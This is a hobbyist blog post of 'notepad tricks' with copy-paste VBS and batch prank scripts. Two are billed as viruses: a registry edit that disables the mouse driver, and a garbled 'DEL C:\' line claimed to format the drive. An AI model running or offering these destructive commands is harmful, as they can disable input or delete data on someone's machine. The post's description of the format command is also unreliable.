Skip to main content

Top 10 Best cool notepad tricks that you should try.

Hi friends in this tutorial i am gonna list top 10 cool notepad ticks.Notepad is a plain-text editor which is included in all windows.It is a built in apps.It is used to open plain text files.Notepad offers only the most basic text manipulation functions, such as finding text.Basically many of us use the notepad in order to store information.But have you ever tried to use it in different way i.e for making fun?If not i will teach you some funny and best notepad tricks.
Top 10 Best cool notepad tricks that you should try.

1.Disco lights on keyboard:

Disco lights on Keyboard.
  • In order to do this open notepad and copy the code in it. 
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
  • Save it with an extension .vbs.
  • In order to stop it just go the Task manager and search for wscript.exe as show in the image.
Stop the wscript.exe in Task manager.

2.Disabling the mouse by creating a virus:


Disabling the mouse.
  • It is harmful so think before you do it.
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
  • Save it with an extension .bat. 

3.Format c drive by creating a virus:

Format c drive by creating a virus.
  •  This one is too harmful so think before you do it. 
@ECHO OFF DEL C:\ *.*|Y
  •  Save this file with an extension .bat.
  • I recommend you to use this one carefully.

4.Making your computer speak to you

Make your computer speak to you.
  • In order to do this open notepad and copy the code.
Dim speaks, speech
speaks="Welcome to your PC, Username"
Set speech=CreateObject("sapi.spvoice")

speech.Speak speaks
  • Now save it as .vbs file.If you want to make it run at the time of windows start,just move the file to starts up as shown below.

All programs>Startup
Moving the file to start up folder.

5.Folder lock :

Lock a folder using notepad.

6.Continuously eject CD/DVD Drive:

Continuously eject C/DVD Rom.
  • Open the notepad and copy the code given below.
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
  • save it with an extension .vbs.
  • You can stop it by going into task manager>Processes>Wscript.exe.

7.Matrix Effect trick:

Matrix effect trick in CMD.
  • In order to do this open notepad and copy the code in it.
@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
  • Save it as .bat file. 

8.Repeating a message continuously:

  •   It will repeat continuously as long as you open it.
@ECHO off

:Begin

msg * Hi

msg * Welcome to worldtech360

msg * Have a nice time

GOTO BEGIN 
  • Save the above one with an extension .bat.

9.Toggle Capslock:

Toogle Capslock effect.
  • Open Notepad and copy the code.
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
  • Save it with an extension .vbs.
  • You can stop by going in to the task manger and closing wscript.exe application.

10.Making Personal dairy:

  • Open notepad and type .LOG.
  • Now save the file with .txt and with any name.
  • Open the file once again,now you will find the time and date in it as shown below.
Making personal dairy using Notepad.
That's it friends now enjoy doing the above tricks and if you have any queries feel free to ask us through comments.

Comments

Popular posts from this blog

How to make an Installation file(setup file) using Iexpress.

Hi guys welcome to worldtech360. In this tutorial or article I  am going to show you how to create an installation file(setup file) for the .EXE file which you have created using an inbuilt option in windows 7 named ‘ iexpress ’. So let’s see how to do this. Note: You can also create an installation file for .bat file files or .VBS files or any other files which are executable. Steps: 1. Choose an .EXE file or any other file for which you want to create a setup file or installation file. In this I am going to use .VBS file 2. Open Run and type “ iexpress ” or “ iexpress.exe ” and hit enter. 3. After hitting enter, iexpress wizard window will popup. On the screen you will see two options i.e. “ create new self-extracting directive file ” and the other is “ open existing self-extracting directive file ”. I recommend you to choose the first option as you are going to create a self-extracting file and click next. 4. In the next window select “ Extract files on...

How to install Backtrack 5 R3 on Oracle VM virtual box

Hi guys in this tutorial i am gonna show you how to install Backtrack 5r3 using virtual box.This tutorial is only for Educational purpose,Don't try to use it in a wrong way.Before going into the discussion let see what exactly backtrack means?Backtrack is an operating system which is developed especially for hackers and other security professionals.Mostly if we want to hack a wifi password i.e WEP or WPA or if we want to do phishing we need certain tools to do it.But Backtrack reduces this burden as it contains a bag full of hacking software's like gerex,Social engineering tools and many more.So lets install backtrack 5 r3 using virtual box. Steps:  Requirements: Backtrack( CLICK HERE ). Virtualbox( CLICK HERE ). 1.Install the Virtual box and open it. 2.Now we see a screen like below. 3.Click on New button and a window will up asking to type the name,Type and version.Select the type as 'linux' and version as 'oracle' as shown below and hit next...

Shutdown your PC using C program.

Hi guys all of we know how to shutdown the PC using batch file or by normal method.But have you ever tried to shutdown your PC using C program.If not in this tutorial i am gonna teach you how to shutdown your  PC by writing a simple c program.so lets see how to do this. Steps: 1.Open any c program compiler and copy the below code. Code to shutdown the PC: For windows 7: #include <stdio.h> #include <stdlib.h> #include<conio.h> //optional main() {    char ch;    printf("Do you want to shutdown your system yes or no\n");    scanf("%c",&ch);    if (ch == 'Y' || ch == 'y')       system("C:\\WINDOWS\\System32\\shutdown /s"); // s-shutdown r-restart l-logoff h-hibernate   getch(); // you can use return 0; instead of getch();   } Note:  S-Shutdown. r-Restart. l-Log off. h-Hibernate. It takes 30 seconds to shutdown,But if you want to shutdown immediately use shut...